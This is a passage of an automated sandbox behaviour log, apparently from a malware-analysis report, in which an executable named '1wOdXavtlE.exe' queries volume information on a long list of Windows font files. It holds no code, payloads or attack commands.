Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
